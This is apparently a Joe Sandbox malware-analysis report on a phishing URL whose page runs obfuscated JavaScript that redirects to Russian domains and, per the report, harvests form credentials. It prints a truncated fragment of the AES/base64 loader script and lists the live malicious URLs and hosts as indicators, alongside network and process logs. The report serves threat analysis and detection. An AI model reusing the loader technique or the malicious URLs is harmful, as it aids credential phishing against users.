Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#

Overview

General Information

Sample URL:https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#
Analysis ID:1566679

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious Javascript
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1964,i,12389587125654596601,18233647799382983469,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#Avira URL Cloud: detection malicious, Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk redirect behavior: Script redirects to a suspicious Russian domain (.ru) with obfuscated parameters. Uses random character generation and URL manipulation. Variable naming suggests intentional obfuscation. Location hash manipulation could be used for command and control or malicious redirects.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script with multiple red flags: uses atob() for obfuscation, contains an encoded suspicious URL (yzv...ru domain), includes anti-debugging measures, blocks security-related keyboard shortcuts, and uses document.write() for DOM manipulation. The code appears to be part of a malicious payload delivery system.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script that loads crypto-js library and performs multiple layers of obfuscation (base64 encoding, AES encryption) to ultimately decode and execute dynamic code via script injection. The use of crypto libraries for obfuscation rather than legitimate encryption, combined with dynamic code execution, strongly suggests malicious intent.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long hostname, 2) Contains form data exfiltration logic, 3) Uses redirects to Microsoft Exchange (likely for legitimacy appearance), 4) Implements Cloudflare Turnstile but appears to be using it maliciously, 5) Uses obfuscated/random-looking variable names. Pattern suggests potential phishing or credential harvesting attempt.
Source: https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#HTTP Parser: Base64 decoded: {"a":"y+DrbaMzqfEzsWdkeX5AXfHN8HxBNGkEks84uY3Xh4GfSIaH\/QxqzsWJX0ttvXhb+tL29C3vT7tQ+yq2UAxww0yRok9qLfgmvz\/StVAmmorkGu04ePTfUVCOTE3IWFWhcNOXFb7guYJZp9m7nuB+qx62YyyBTSRFp\/vLNNI9AGLuiA29ZtbYgaanROvVEskClyBXr98bZad8USg4oLrQ6zoApz9L+VZqZKtcSzjph9C5Gc4q0GdFI2...
Source: https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#HTTP Parser: var etkcefkwpmxmssld = document.createelement("script");etkcefkwpmxmssld.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(etkcefkwpmxmssld);etkcefkwpmxmssld.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiestecmjhtxpxzkv6c1dka2vynufyzkhooeh4qk5ha0vrczg0dvkzwgg0r2ztswfixc9rehf6c1dkwdb0dhzyagirdewyoumzdlq3dferexeyvuf4d3cwevjvazlxtgznbxz6xc9tdfzbbw1vcmthdta0zvbuzlvwq09urtnjv0zxagnot1hgyjdndvlkwna5btduduircxg2mll5eujuu1jgcfwvdkxotkk5qudmdwlbmjladgjzz2fhbljpdlzfc2tdbhlcwhi5ogjaywq4vvnnng9mcle2em9bcho5tctwwnfas3rju3pqcgg5qzvhyzrxmedkrkkyqzfusjzmamzkskfyse82xc9luhvbwnrgnlvxuejhm2f1zvdbvwtiz0xxmwz6yjbyem5vesthbwxjajfidxiwzfbusgrychi0t085k29yskjnwu9jwlhky05ks1favw9wcegwvxhwtzi1zflcl2znwmxkmtrpbde5tvpotjhqrdhrwkpjaefam052z29nwlvwagp2u3ozcnduq25jm3hca0qxqmc1dufclzrmv0nbcmo0nu54uldmeni4ymxkwvo5amfzy2i2dhzya3hedkh4dtnsqxyrowg4eudtrkx2mvvwbwpiwjntvk1pafc3ow9heuz0sgthshnbnjg3dnrvbwrhm1zkvhjodw91zulduu5ioxhzc25zc2jpewzdrwdqsfbmcvo4qzu1dwtreuhon...
Source: https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#HTTP Parser: No favicon
Source: https://jbgw.yzvufnxc.ru/SNNgfwO/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: global trafficDNS traffic detected: DNS query: francinecrowley.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: jbgw.yzvufnxc.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ewnx8xri6zljjepfgh6kolgqbycqaxmnzjnu3wrsaggglkphxzlsvspmcqi1.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: classification engineClassification label: mal52.win@25/15@30/178
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1964,i,12389587125654596601,18233647799382983469,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1964,i,12389587125654596601,18233647799382983469,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jbgw.yzvufnxc.ru
172.67.132.7
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      ewnx8xri6zljjepfgh6kolgqbycqaxmnzjnu3wrsaggglkphxzlsvspmcqi1.birsbunh.ru
      104.21.11.98
      truefalse
        unknown
        google.com
        142.250.181.142
        truefalse
          high
          code.jquery.com
          151.101.194.137
          truefalse
            high
            francinecrowley.com
            69.49.245.172
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  high
                  www.google.com
                  172.217.21.36
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://jbgw.yzvufnxc.ru/SNNgfwO/false
                      unknown
                      https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#true
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.17.24.14
                        cdnjs.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        172.217.19.238
                        unknownUnited States
                        15169GOOGLEUSfalse
                        1.1.1.1
                        unknownAustralia
                        13335CLOUDFLARENETUSfalse
                        172.217.17.67
                        unknownUnited States
                        15169GOOGLEUSfalse
                        172.217.17.46
                        unknownUnited States
                        15169GOOGLEUSfalse
                        69.49.245.172
                        francinecrowley.comUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        172.67.132.7
                        jbgw.yzvufnxc.ruUnited States
                        13335CLOUDFLARENETUSfalse
                        104.18.94.41
                        challenges.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        8.8.8.8
                        unknownUnited States
                        15169GOOGLEUSfalse
                        64.233.165.84
                        unknownUnited States
                        15169GOOGLEUSfalse
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        151.101.66.137
                        unknownUnited States
                        54113FASTLYUSfalse
                        172.217.21.35
                        unknownUnited States
                        15169GOOGLEUSfalse
                        172.217.21.36
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        151.101.194.137
                        code.jquery.comUnited States
                        54113FASTLYUSfalse
                        35.190.80.1
                        a.nel.cloudflare.comUnited States
                        15169GOOGLEUSfalse
                        104.21.11.98
                        ewnx8xri6zljjepfgh6kolgqbycqaxmnzjnu3wrsaggglkphxzlsvspmcqi1.birsbunh.ruUnited States
                        13335CLOUDFLARENETUSfalse
                        IP
                        192.168.2.16
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1566679
                        Start date and time:2024-12-02 15:03:46 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Sample URL:https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal52.win@25/15@30/178
                        • Exclude process from analysis (whitelisted): svchost.exe
                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.165.84, 34.104.35.123
                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 13:04:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2673
                        Entropy (8bit):3.987308918264044
                        Encrypted:false
                        SSDEEP:
                        MD5:5B3862F10EDC71D86E1AE02D55ED1E18
                        SHA1:1654E9FA051C86114B2DA885833206B8B33436F7
                        SHA-256:346F0E33963243D416DF6964F7F83A56694B9FE491A4C55CE3252F41DEB6C33B
                        SHA-512:6560158D832A372861A7B3BA43830E6C337FE96B6F5DBFFA99998823A70C3EDEBCC5499732C67A91644D3ECBF3D2C4748276C3B759DC199C06F22BFE6F9B4055
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....?....D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y|p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 13:04:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2675
                        Entropy (8bit):4.002211634410281
                        Encrypted:false
                        SSDEEP:
                        MD5:5469C345658EEC5B3D01A7F362F410C4
                        SHA1:9D9116E48DCFC809477975ED4F5ECC76707B3289
                        SHA-256:B5027C32BF47217A4B619C7663ECB17142E6E85512BB732CE73D4902B7CD1245
                        SHA-512:0FD85314708BAEAF543F48498AFB3854CBE00C34F0E5F7B94F71FB4DF4F442B99F6FDFFE627ADADA271D6B244AEDE8F7F64081154F36A30D26D8487CF6D1D1BC
                        Malicious:false
                        Reputation:unknown
